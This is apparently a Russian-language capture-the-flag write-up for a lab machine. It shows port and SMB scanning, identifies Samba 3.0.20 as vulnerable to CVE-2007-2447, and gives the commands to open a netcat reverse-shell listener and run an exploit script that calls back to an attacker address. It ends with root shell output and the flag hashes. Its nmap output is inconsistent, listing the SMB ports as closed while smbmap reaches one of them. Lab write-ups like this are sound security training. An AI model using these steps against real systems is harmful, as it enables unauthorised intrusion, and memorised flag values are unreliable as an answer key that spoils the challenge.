Обзор сервисов
Пройдемся сканеров портов по машине 10.10.10.3:
$ nmap --privileged -sV -sC -Pn -oN 10.10.10.3 10.10.10.3
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
На машине присутствует сервер Samba.
Samba
Посмотрим на сервер самбы ближе.
$ smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
Старая версия 3.0.20 подвержена CVE-2007-2447.
python3 -m venv env
source env/bin/activate
pip install pysmb
rlwrap nc -lnvp 1234
python usermap_script.py 10.10.10.3 445 10.10.14.7 1234
Флаги
root@lame:/home/makis# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:50:56:b9:0d:c3 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.3/24 brd 10.10.10.255 scope global eth0
inet6 dead:beef::250:56ff:feb9:dc3/64 scope global dynamic
valid_lft 85851sec preferred_lft 13851sec
inet6 fe80::250:56ff:feb9:dc3/64 scope link
valid_lft forever preferred_lft forever
root@lame:/home/makis# cat user.txt
38140ce7de697c5a0c0ff4d399bf9c0f
root@lame:/root# cat root.txt
fdf9cd300806c6f046c6f9a1d9dbce3e